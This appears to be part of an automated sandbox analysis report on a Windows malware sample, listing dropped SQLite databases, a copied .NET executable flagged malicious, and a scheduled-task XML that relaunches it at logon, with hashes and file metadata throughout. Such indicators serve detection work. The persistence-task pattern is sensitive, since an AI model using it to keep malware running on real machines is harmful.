                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1572
                                                                              Entropy (8bit):5.109974082247876
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtah5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTWvv
                                                                              MD5:9DAB35F5393ED8F57F052BE5CF1CE0A0
                                                                              SHA1:5073F35EA903FC7B574EDA399EDD1BEE813983A7
                                                                              SHA-256:554AFCEB1DFE351247804981500CFEC8FD9C36E8241AC7CABB17AE11065C565E
                                                                              SHA-512:DEBDDCE7DF24A10B86FFEF643D6D592E789A3031D5536100373864B67E7E68661465A83AE589A319044F5D1B37608960EF7E59CF1B893FBA3F13288BCEEE20A9
                                                                              Malicious:true
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1572
                                                                              Entropy (8bit):5.109974082247876
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtah5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTWvv
                                                                              MD5:9DAB35F5393ED8F57F052BE5CF1CE0A0
                                                                              SHA1:5073F35EA903FC7B574EDA399EDD1BEE813983A7
                                                                              SHA-256:554AFCEB1DFE351247804981500CFEC8FD9C36E8241AC7CABB17AE11065C565E
                                                                              SHA-512:DEBDDCE7DF24A10B86FFEF643D6D592E789A3031D5536100373864B67E7E68661465A83AE589A319044F5D1B37608960EF7E59CF1B893FBA3F13288BCEEE20A9
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.694982189683734
                                                                              Encrypted:false
                                                                              SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                              MD5:E49F84B05A175C231342E6B705A24A44
                                                                              SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                              SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                              SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.700014595314478
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.694982189683734
                                                                              Encrypted:false
                                                                              SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                              MD5:E49F84B05A175C231342E6B705A24A44
                                                                              SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                              SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                              SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.700014595314478
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                              Malicious:false
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):706568
                                                                              Entropy (8bit):7.851586551804549
                                                                              Encrypted:false
                                                                              SSDEEP:12288:QPSg4dwyerVbCx3YNAguNN9WSrLuWXSAdVPOgOFHSLWB0io0CJohPCAOkR:2Sg4WrVbCx3YNhuNN9tW/A7OgOkQtC0V
                                                                              MD5:01D452E81B85A3D399A247852F2F5004
                                                                              SHA1:B1B5BB7EDF69875726EA1C627FB0BBEF6215143A
                                                                              SHA-256:88FD2273DBA726F8E93082EEF548564C84EE1F3BE9F69A7D02EF9A3ED7F8EA18
                                                                              SHA-512:D1F62C8A067F9D2A241CC4604883E41AA9860FD09719BA2827DD0F2DE9920411E62B57B9BA7A1E5184736C473BA4D621E31A194224A513DE66A2879131C8F9BB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
